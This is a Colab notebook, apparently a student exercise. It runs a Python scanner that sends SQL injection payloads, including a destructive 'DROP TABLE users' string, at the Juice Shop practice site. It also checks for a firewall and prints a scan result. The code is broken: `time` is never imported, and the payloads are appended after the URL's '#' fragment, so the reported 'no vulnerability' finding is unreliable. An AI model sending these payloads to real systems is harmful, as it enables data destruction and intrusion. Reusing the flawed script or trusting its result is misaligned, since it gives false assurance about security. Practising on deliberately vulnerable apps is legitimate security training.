<a href="https://colab.research.google.com/github/roger977/Habimana_2409001107/blob/main/vulnerability_check.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
import requests

# Targeted  URL
url = "https://juice-shop.herokuapp.com/#/"

# SQL Injection payloads
sql_payloads = [
    "' OR 1=1 --",         # Classic SQLi
    "' UNION SELECT NULL, NULL --",  # Union-based SQLi
    "'; DROP TABLE users; --",       # Dangerous SQL command
    "' AND SLEEP(5) --"     # Time-based SQLi (delayed response)
]

# Function to check connection errors
def check_connection(url):
    try:
        response = requests.get(url, timeout=5)
        return response.status_code
    except requests.RequestException as e:
        print("Connection error:", e)
        return None

# Function to check for WAF (Web Application Firewall)
def check_waf(response):
    if response and (response.status_code == 403 or "Security" in response.text):
        print("Possible Web Application Firewall (WAF) detected!")
        return True
    return False

# Function to test SQL injection
def test_sql_injections(url, payloads):
    for payload in payloads:
        # Test for regular SQL injection
        injection_url = f"{url}?search={payload}"
        print(f"Testing with payload: {payload}")
        try:
            response = requests.get(injection_url, timeout=5)
            if response.status_code != 200:
                print(f"Connection error or request blocked for payload: {payload}")
                return

            if payload == "' AND SLEEP(5) --":
                # Time-based SQLi: Check if the response takes longer than usual
                start_time = time.time()
                response = requests.get(injection_url, timeout=10)
                end_time = time.time()
                if end_time - start_time > 5:
                    print("Possible Time-based SQL Injection detected with payload:", payload)
                    return

            # Check for signs of SQL Injection (error messages or unexpected responses)
            if "SQL" in response.text or "error" in response.text:
                print(f"SQL Injection detected with payload: {payload}")
                return
        except requests.RequestException as e:
            print(f"Request error with payload {payload}: {e}")

    print("No SQL Injection vulnerability detected")

# Main function
def main():
    print("Starting vulnerability scan...\n")

    # Check for connection issues
    status_code = check_connection(url)
    if status_code is None:
        print("Could not connect to the target URL.")
        return
    print(f"Connection successful with status code: {status_code}")

    # Send a sample request to check for WAF
    response = requests.get(url)
    if check_waf(response):
        return

    # Test for SQL injections
    test_sql_injections(url, sql_payloads)

# Run the main function
if __name__ == "__main__":
    main()


Starting vulnerability scan...

Connection successful with status code: 200
Testing with payload: ' OR 1=1 --
Testing with payload: ' UNION SELECT NULL, NULL --
Testing with payload: '; DROP TABLE users; --
Testing with payload: ' AND SLEEP(5) --
No SQL Injection vulnerability detected
